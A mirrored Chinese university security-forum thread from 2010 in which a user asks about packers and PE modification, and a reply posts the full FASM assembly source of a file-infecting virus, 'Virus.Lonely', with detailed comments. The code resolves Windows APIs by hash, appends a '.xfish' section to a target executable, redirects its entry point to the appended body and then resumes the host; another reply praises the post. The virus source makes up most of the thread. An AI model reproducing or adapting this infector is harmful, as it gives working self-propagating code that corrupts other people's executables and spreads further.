哪位大牛有加壳的或者PE修改的经历留一下联系方式,有问题请教请教啊。
这是一条镜像帖。来源:北邮人论坛 / security / #27373同步于 2010/3/23
【找】哪位大牛有加壳的或者PE修改的经历留一下联系方式
lhy137910144
2010/3/23镜像同步4 回复
4 条回复
pe修改简单,无非添加节,插入代码等。要掌握的重点 对引入表 引出表 重定位 资源 结构的处理。
写壳也没什么难的,无非构建loader还原原有数据代码,但是要想做一个强大的保护壳或者是压缩壳需要的是成熟的思路和算法。如果仅仅需要个修改pe的代码,那么你就看下之前写的一段变形pe头添加节的病毒代码吧。
[code]
;+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
;
; Virus.Lonely By: xfish
;
; (c)2009-05-20
; --- Lonely xfish. Email: AntiAntiWorm@Gmail.com
; --- thanks 29a, pediy, hacker.com.cn
;-----------------------------------------------------------------------------
; Build directives (FASM syntax): a 32-bit GUI PE made of one section that is
; code, readable, writeable and executable at the same time. The body later
; overwrites its own instruction immediates at run time (Inject patches the
; operand at .FreeSize and at JmpHost+1), which is why the section is writeable.
; Analysis note: no import section is declared anywhere in this listing; every
; API is resolved by hash at run time (see GetKrnlBase / GetFuncAddress).
; Detection note: a single RWX section named '.Lonely' is a static indicator
; for the dropper; infected hosts instead gain a section named '.xfish'
; (see AddSectionTable).
format PE GUI 4.0
include 'win32ax.inc'
entry Virus_Entry
section '.Lonely' code readable writeable executable
;++
;
; Virus_Entry
;
; Routine Description:
;
; Shared entry point of the dropper and of the body appended to an infected
; host. ebp is established as the load delta (run-time address minus
; assembled address) and every label reference below goes through
; [ebp + label], because the same bytes run at a different address once
; appended to a host.
;
; Register roles after the prologue:
;
; ebp = load delta (0 only when running as the original dropper)
; edi = run-time address of the dwFunc hash/pointer table
;
; Control flow:
;
; delta == 0 : dropper path (.Inject) -- infect 'test.exe', return
; delta != 0 : infected-host path -- show a MessageBox, infect 'test2.exe',
; then transfer control to the host's original entry point
;
;--
Virus_Entry:
pushad
call Dels                               ; pushes the run-time address of the int 3 run
int 3
int 3
int 3
Dels:
pop ebp                                 ; ebp = run-time address of (Dels - 6)
sub ebp, Dels-2*3                       ; ebp = load delta; the arithmetic assumes each 'int 3' assembles to the 2-byte form (CD 03) -- TODO confirm for this assembler
; kernel32
call GetKrnlBase                        ; eax = kernel32 image base taken from the PEB
lea edi, [ebp+dwFunc]                   ; edi = relocated address of the hash/pointer table
push edi
push eax
call GetFuncAddress                     ; first pass: fill the slots that kernel32 exports
@pushsz 'user32'                        ; @pushsz presumably pushes a pointer to an inline ASCIIZ string (macro from the included headers)
call [edi + _LoadLibray-dwFunc]         ; LoadLibrary("user32") through the slot resolved above; eax = user32 base
push edi
push eax
call GetFuncAddress                     ; second pass: fill the remaining slot (MessageBox) from user32
test ebp, ebp                           ; delta == 0 -> running as the dropper itself
jz .Inject
; Infected-host path (delta != 0).
push 0
@pushsz 'Virus Demo'
@pushsz 'by:xfish http://www.pediy.com http://www.hacker.com.cn'
push 0
call [edi + _MessageBox-dwFunc]
push dword [ebp+JmpHost+1]              ; host's original entry point, stored by Inject into the push immediate at JmpHost
pop dword [esp+pushad_eax]              ; drop it into the eax slot saved by pushad
@pushsz 'test2.exe'                     ; hard-coded relative file name
call Inject
popad
push eax                                ; eax = original entry point (absolute, see Inject)
retn                                    ; hand control to the host
.Inject:
; Dropper path: infect one hard-coded relative file name and exit.
@pushsz 'test.exe'
call Inject
popad
retn
;++
;
; int
; GetKrnlBase(
; void
; )
;
; Routine Description:
;
; Get the kernel32 image base without using an import table, by walking
; the PEB loader data (NT family) or an undocumented structure (Win9x).
;
; Arguments:
;
; (esp) - return address
;
;
; Return Value:
;
; eax = krnlbase
;
; Clobbers: eax, flags.
;
; Analysis note: the NT path takes the SECOND entry of the loader's
; initialization-order list. That ordering (ntdll, then kernel32) held on the
; Windows versions current when this was written (2009); on later releases the
; second entry is a different module, so the lookup is not version-independent.
;
;--
GetKrnlBase:
sub eax, eax
mov eax, [fs:eax+30h]                   ; fs:[30h] = PEB on the NT family
test eax, eax
js .Os9x                                ; a negative (high) address here is taken to mean Win9x -- presumption of the author, not verified here
mov eax, [eax+0ch]                      ; PEB.Ldr
mov eax, [eax+1ch]                      ; Ldr.InInitializationOrderModuleList.Flink
mov eax, [eax]                          ; second entry in initialization order
mov eax, [eax+8h]                       ; DllBase of that entry
jmp .Result
.Os9x:
; Win9x path: undocumented structure walk; the offsets are not verified here.
mov eax, [eax+34h]
lea eax, [eax+7ch]
mov eax, [eax+3ch]
.Result:
retn
;++
;
; int
; GetFuncAddress(
; int hModule,
; int pHashStringList
; )
;
; Routine Description:
;
; Resolve API addresses by name hash. Walks the export name table of the
; module at hModule, hashes every exported name, and for every hash that
; matches an entry of pHashStringList stores the export's absolute address
; into the dword that follows the hash in the list.
;
; List layout (see dwFunc): repeated pairs of (dd hash, dd address-slot).
; The scan of the list stops at the first pair whose hash dword is 0.
;
; Arguments:
;
; (esp) - return address
; (esp+4*8+4) - hModule (offsets are as seen after pushad)
; (esp+4*8+8) - pHashStringList
;
; Return Value:
;
; nothing (the list is filled in place; callee cleans 8 bytes of arguments)
;
; Detection note: the rol-3 / xor-byte hash below together with the constants
; in dwFunc is a stable static signature; the routine never touches an import
; table, so the infected file shows no IAT entries for the APIs it uses.
;
;--
GetFuncAddress:
pushad
mov ebx, [esp+4*8+4]                    ; ebx = module base (8 saved regs + return address precede the args)
mov edx, [ebx+3ch]                      ; e_lfanew
mov esi, [ebx++edx+78h]                 ; RVA of the export directory (DataDirectory[0] at NT headers + 78h)
lea esi, [esi+ebx+18h]                  ; esi -> IMAGE_EXPORT_DIRECTORY.NumberOfNames
lodsd
xchg eax, ecx                           ; ecx = NumberOfNames (loop counter)
lodsd
add eax, ebx
xchg eax, ebp                           ; ebp = AddressOfFunctions (ebp is reused here; popad restores the caller's value)
lodsd
add eax, ebx
xchg eax, edx                           ; edx = AddressOfNames
lodsd
add eax, ebx
push eax                                ; [esp] = cursor into AddressOfNameOrdinals, advanced by 2 per name
mov esi, edx
.Next_Func:
lodsd
add eax, ebx                            ; eax -> next exported name (ASCIIZ)
; Make Func Hash
; edx = rol(edx, 3) ^ byte, over every byte of the name up to the NUL.
xor edx, edx
.Make_Hash:
rol edx, 3
xor dl, byte [eax]
inc eax
cmp byte [eax], 0
jnz .Make_Hash
mov eax, [esp]                          ; eax -> ordinal belonging to this name
add dword [esp], 2                      ; advance the ordinal cursor
mov edi, [esp+4*8+8+4]                  ; edi = pHashStringList (extra +4 because of the pushed cursor)
.Scan_Dw_Funcs:
cmp dword [edi], edx                    ; does this list entry want the current name?
jnz .Next_List
movzx eax, word [eax]                   ; ordinal
mov eax, [ebp+eax*4]                    ; AddressOfFunctions[ordinal] (RVA)
add eax, ebx                            ; -> absolute address
scasd                                   ; step over the hash dword
stosd                                   ; store the address in the entry's slot
jmp .Ret
.Next_List:
scasd
scasd                                   ; next (hash, slot) pair
cmp dword [edi], 0                      ; NOTE(review): dwFunc itself ends without an explicit zero hash; termination relies on whatever bytes follow the table
jne .Scan_Dw_Funcs
.Ret:
loop .Next_Func                         ; ecx = names still to examine
pop ecx                                 ; discard the ordinal cursor
popad
retn 4*2
;++
;
; CF
; IsPe(
; pByte pMemory
; )
;
; Routine Description:
;
; Test whether the buffer at pMemory starts with a PE image: 'MZ' at
; offset 0 and 'PE' at the offset given by e_lfanew (offset 3ch).
; Only the two signatures are checked; e_lfanew is not validated against
; the buffer length before it is dereferenced.
;
; Arguments:
;
; (esp) - return address
;
; [esp+4] - pMemory
;
; Return Value:
;
; CF = 1 -- both signatures present
; CF = 0 -- not a PE image
; Clobbers: edx, flags. (Callee cleans 4 bytes of arguments.)
;--
IsPe:
mov edx, [esp+4]
cmp word [edx], 'MZ'                    ; IMAGE_DOS_SIGNATURE
jnz .RetFalse
add edx, [edx+3ch]                      ; edx -> NT headers via e_lfanew
cmp word [edx], 'PE'                    ; low word of IMAGE_NT_SIGNATURE
jnz .RetFalse
.RetTrue:
stc
retn 4*1
.RetFalse:
clc
retn 4*1
;++
;
; CF
; IsFileType(
; LPCTSTR lpFileName
; )
;
; Routine Description:
;
; Test whether the named file is a 32-bit Windows binary, using
; GetBinaryType and comparing the reported type with SCS_32BIT_BINARY (0).
;
; Precondition: ebp holds the load delta set up in Virus_Entry, because the
; API is called through [ebp + _GetBinaryType].
;
; Arguments:
;
; (esp) - return address
;
; [esp+4] - lpFileName
;
; Return Value:
;
; CF -- 1, = TRUE.
; Clobbers: eax, flags. (Callee cleans 4 bytes of arguments.)
;
; NOTE(review): the BOOL result of GetBinaryType is overwritten by the 'pop eax'
; below, so a failed call (local still 0) is indistinguishable from a genuine
; 32-bit binary here.
;
;--
IsFileType:
push 0                                  ; local: lpBinaryType output slot
push esp                                ; &local
push dword [esp+4*2+4]                  ; lpFileName (two pushes above the argument)
call dword [ebp + _GetBinaryType]
pop eax                                 ; eax = reported binary type (discards the BOOL return)
; 32BIT_BINARY = 0
test eax, eax
jne .RetFalse
.RetTrue:
stc
retn 4*1
.RetFalse:
clc
retn 4*1
;++
;
; void
; Inject(
; LPCTSTR lpFileName
; )
;
; Routine Description:
;
; Infect one file: read it into memory, append a section header for the
; virus body (AddSectionTable), redirect AddressOfEntryPoint to that section
; while remembering the original entry point, write the modified image back,
; grow the file by Virus_Len bytes and write the body at the end.
;
; Precondition: ebp holds the load delta from Virus_Entry (all API calls go
; through [ebp + slot]).
;
; Register roles:
;
; esi = lpFileName
; ebx = file handle
; edi = in-memory copy of the file (VirtualAlloc)
; edx = file size, later the new section's RVA (from AddSectionTable)
;
; Arguments:
;
; (esp) - return address
;
; [esp+4] - lpFileName
;
; Return Value:
;
; nothing (errors are silent; every path ends at .Result)
;
; Detection / mitigation notes:
; - The file is rewritten in place from offset 0, then extended by Virus_Len
;   and the body is written at the end; the appended bytes carry the resolved
;   API addresses in dwFunc and the host's entry point, so those dwords vary
;   per infection while the surrounding code bytes do not.
; - The stored entry point is absolute (RVA + ImageBase); a host that is
;   relocated at load time (e.g. by ASLR) does not resume where expected.
; - This routine patches two instruction immediates inside its own image
;   (.FreeSize and JmpHost+1): self-modifying code in a writeable section.
;
;--
Inject:
pushad
mov esi, [esp+4*8+4*1]                  ; esi = lpFileName
;++
; Is File Pe Format
push esi
call IsFileType                         ; CF = 0 -> not a 32-bit binary, give up
jnc .Result
;--
sub eax, eax
push eax                                ; hTemplateFile = NULL
push eax                                ; dwFlagsAndAttributes = 0
push OPEN_EXISTING
push eax                                ; lpSecurityAttributes = NULL
push FILE_SHARE_WRITE
push GENERIC_READ or GENERIC_WRITE
push esi
call [ebp + _CreateFile]
cmp eax, -1                             ; INVALID_HANDLE_VALUE
jz .Result
xchg eax, ebx                           ; ebx = file handle
push 0
push ebx
call [ebp + _GetFileSize]
push eax                                ; keep the size across VirtualAlloc
;
push PAGE_READWRITE
push MEM_COMMIT
push eax                                ; dwSize = file size
push 0
call [ebp + _VirtualAlloc]
;
pop edx                                 ; edx = file size
test eax, eax
jz .CloseHandle
xchg eax, edi                           ; edi = buffer
mov dword [ebp + .FreeSize], edx        ; patch the 'push $' immediate at .FreeSize with the size (self-modifying)
push 0
push esp                                ; lpNumberOfBytesRead -> the 0 pushed above
push dword [ebp + .FreeSize]
push edi
push ebx
call [ebp + _ReadFile]                  ; whole file -> edi
test eax, eax
jz .FreeMem
push edi
call IsPe                               ; CF = 0 -> not PE, give up
jnc .FreeMem
push Virus_Len
push edi
call AddSectionTable                    ; eax = new section raw offset (0 = fail), edx = new section RVA
test eax, eax
jz .FreeMem
;++ Update Oep, Write JmpHost
mov eax, edi
add eax, [eax+3ch]                      ; eax -> NT headers
mov ecx, edx                            ; ecx = new section RVA
xchg ecx, [eax+28h]                     ; AddressOfEntryPoint <- new RVA; ecx <- original entry point RVA
add ecx, [eax+34h]                      ; + ImageBase -> absolute original entry point
mov dword [ebp + JmpHost+1], ecx        ; store it in the 'push' immediate at JmpHost (self-modifying)
;--
push FILE_BEGIN
push 0
push 0
push ebx
call [ebp+ _SetFilePointer]             ; rewind to offset 0
push 0
push esp                                ; lpNumberOfBytesWritten
lea eax, [ebp + .FreeSize]
push dword [eax]                        ; original file size (from the patched immediate)
push edi
push ebx
call [ebp + _WriteFile]                 ; write the modified image back in place
test eax, eax
jz .FreeMem
push FILE_END
push 0
push Virus_Len
push ebx
call [ebp + _SetFilePointer]            ; end of file + Virus_Len
push ebx
call [ebp + _SetEndOfFile]              ; grow the file by Virus_Len
push FILE_CURRENT
push 0
push -(Virus_Len)
push ebx
call [ebp + _SetFilePointer]            ; back to the start of the new tail
push 0
push esp                                ; lpNumberOfBytesWritten
push Virus_Len
lea eax, [ebp + Virus_Entry]
push eax                                ; source = this code image, Virus_Entry .. Virus_Entry+Virus_Len
push ebx
call [ebp + _WriteFile]                 ; append the body
test eax, eax
jz .FreeMem                             ; falls through to .FreeMem either way
.FreeMem:
push MEM_DECOMMIT
.FreeSize = $ + 1                       ; address of the imm32 of the following 'push', patched at run time with the file size
push $
push edi
call [ebp + _VirtualFree]
.CloseHandle:
push ebx
call [ebp + _CloseHandle]
.Result:
popad
retn 4*1
;++
;
; int
; AddSectionTable(
; pByte pMemory
; DWORD dwLen
; )
;
; Routine Description:
;
; Append a section header named '.xfish' of dwLen bytes to the in-memory PE
; image at pMemory. If the section table has no room for one more entry
; before the first section's raw data, the NT headers and section table are
; first moved down to file offset 0ch (overwriting the DOS stub) and
; e_lfanew is set to 0ch.
;
; Register roles:
;
; ebx = pMemory
; esi = NT headers
; edi = slot for the new section header
; edx = first section's raw data (absolute, within the buffer)
;
; Arguments:
;
; (esp) - return address
;
; [esp+4*8+4*1] - pMemory (offsets as seen after pushad)
;
; [esp+4*8+4*2] - dwLen
;
; Return Value:
;
; eax = New Section PhysicalOffset, 0
; (0 when the headers were already moved to 0ch, i.e. the file was
; processed before; edx is then left unchanged)
; edx = New Section VirtualOffset
;
; Detection notes:
; - An image with e_lfanew == 0ch and the 'PE' signature at offset 0ch is the
;   marker this routine uses to recognise a file it already handled.
; - The added section is named '.xfish', has Characteristics 0E0000020h
;   (code | executable | readable | writeable) and its VirtualAddress equals
;   the previous SizeOfImage.
; - DataDirectory[11] (bound imports) has its RVA zeroed.
;
;--
AddSectionTable:
pushad
mov ebx, [esp+4*8+4*1]                  ; ebx = pMemory
mov esi, ebx
add esi, [esi+3ch]                      ; esi -> NT headers
;++
; edi = Section Table
movzx ecx, word [esi+IMAGE_FILE_HEADER.SizeOfOptionalHeader+4]
lea edi, dword [esi+ecx+4+sizeof.IMAGE_FILE_HEADER]   ; signature + file header + optional header
;--
;++
; Clear Bound Import Entry
lea edx, [esi+74h]                      ; edx -> OptionalHeader.NumberOfRvaAndSizes
cmp dword [edx], 10h
jl .GoSectionTable                      ; fewer than 16 directories: nothing to clear
mov dword [edx+4+11*8], 0               ; DataDirectory[11].VirtualAddress (bound import) = 0
;--
.GoSectionTable:
;++
; edx = First Section Offset
; edi = Last Section Table Offset
mov edx, [edi+IMAGE_SECTION_HEADER.PointerToRawData]
add edx, ebx                            ; edx = first section's raw data inside the buffer
movzx ecx, word [esi+IMAGE_FILE_HEADER.NumberOfSections+4]
imul ecx, ecx, sizeof.IMAGE_SECTION_HEADER
add edi, ecx                            ; edi = slot just past the last section header
;--
;++
; Expand PE Header Struct
; BaseOfData equ .lfanew
push edx
mov eax, edi
sub edx, eax                            ; edx = free bytes between the section table and the first section
cmp edx, sizeof.IMAGE_SECTION_HEADER
pop edx
jge .AddSectionTable                    ; enough room for one more header
; Test Expand Is Exist
cmp word [ebx+0ch], 'PE'                ; headers already moved to 0ch -> file was processed before
jnz .Expand
xor eax, eax
mov [esp+pushad_eax], eax               ; return eax = 0
jmp .Result
.Expand:
; Move NT headers + section table (esi .. edi) down to offset 0ch and
; zero-fill up to the first section's raw data; the DOS stub is lost.
sub eax, esi
xchg eax, ecx                           ; ecx = bytes to move
pushad
lea edi, [ebx+0ch]                      ; destination
mov dword [esp+pushad_esi], edi         ; outer esi <- new NT headers address
cld
rep movsb
mov dword [esp+pushad_edi], edi         ; outer edi <- new slot past the moved table
sub edx, edi
xchg ecx, edx                           ; ecx = bytes up to the first section's raw data
xor eax, eax
rep stosb                               ; zero the gap
popad
mov dword [ebx+3ch], 0ch                ; e_lfanew = 0ch
;--
.AddSectionTable:
; Inc Num
inc word [esi+06h]                      ; FileHeader.NumberOfSections++
; Section Name
mov dword [edi], '.xfi'
mov word [edi+4], 'sh'                  ; Name = ".xfish"
; Physical size
push dword [esp+4*8+4*2]
pop dword [edi+10h]                     ; SizeOfRawData = dwLen
; Physical offset
lea edx, [edi-28h]                      ; edx -> previous (last existing) section header
mov eax, [edx+14h]                      ; prev.PointerToRawData
mov ecx, [edx+10h]                      ; prev.SizeOfRawData
add eax, ecx
mov dword [edi+14h], eax                ; PointerToRawData = end of previous section's raw data
mov dword [esp+pushad_eax], eax         ; return eax
; Virtual size
push dword [esp+4*8+4*2]
pop dword [edi+8h]                      ; VirtualSize = dwLen
; Virtual offset
push dword [esi+50h]                    ; OptionalHeader.SizeOfImage
pop eax
mov dword [edi+0ch], eax                ; VirtualAddress = old SizeOfImage
mov [esp+pushad_edx], eax               ; return edx
; Flags
mov dword [edi+24h], 0E0000020h         ; Characteristics: code | exec | read | write
; SizeOfImage
mov ecx, [edi+08h]
add ecx, [edi+0ch]
mov dword [esi+50h], ecx                ; SizeOfImage = VirtualAddress + VirtualSize (no alignment rounding applied here)
.Result:
popad
retn 4*2
;++
; JmpHost
;
; Storage for the host's original entry point: Inject writes the absolute
; address into the imm32 of the 'push' below ([ebp + JmpHost+1]), and
; Virus_Entry reads it back from there before returning into the host.
; The instructions themselves are not executed on the paths visible in this
; listing; 'push $' only reserves the 4-byte immediate.
;--
JmpHost:
push $
retn
;--
;++++++++++++++++++++++++++++++++++++++++++++++++++
; dwFunc -- API hash / address table consumed by GetFuncAddress.
; Each entry is (dd hash, dd slot); the slot is filled at run time with the
; resolved address and is called as [ebp + _Name] (or [edi + _Name-dwFunc]).
; The hash constants are presumably the rol-3/xor hashes of the API name
; given by each slot's label -- the exact exported names (e.g. an 'A' suffix)
; are not visible here. '_LoadLibray' is the author's spelling and is part
; of the program, so it is left as is.
; Detection note: because this table lies inside Virus_Entry..Virus_Len,
; the resolved addresses are carried into every infected file.
; NOTE(review): no terminating zero hash follows the last entry; see the
; end-of-list test in GetFuncAddress.
dwFunc:
dd 0C0D6D616h
_CloseHandle dd 0
dd 038C62A7Ah
_CreateFile dd 0
dd 0ABD10842h
_GetBinaryType dd 0
dd 09554EFE7h
_GetFileSize dd 0
dd 00BE25545h
_ReadFile dd 0
dd 0A97175F9h
_SetEndOfFile dd 0
dd 0A9D1FD70h
_SetFilePointer dd 0
dd 0AB16D0AEh
_VirtualAlloc dd 0
dd 0B562D3DBh
_VirtualFree dd 0
dd 058D8C545h
_WriteFile dd 0
dd 0A412FD89h
_LoadLibray dd 0
dd 014D14C51h
_MessageBox dd 0
;-------------------------------------------------
; Assembly-time length of the body that Inject appends to a host
; (everything from Virus_Entry up to here, table included).
Virus_Len = $ - Virus_Entry
[/code]
为小鱼同学颁发奖状,以表彰小鱼为信息安全版增添的学术气氛。
欢迎小鱼同学常来信息安全版,分享自己的知识。
【 在 xfish (小鱼) 的大作中提到: 】
: pe修改简单,无非添加节,插入代码等。要掌握的重点 对引入表 引出表 重定位 资源
: 结构的处理。
: 写壳也没什么难的,无非构建loader还原原有数据代码,但是要想做一个强大的保护壳
: 或者是压缩壳需要的是成熟的思路和算法。如果仅仅需要个修改pe的代码,那么你就看下
: 之前写的一段变形pe头添加节的病毒代码吧。
: [code]
: ...................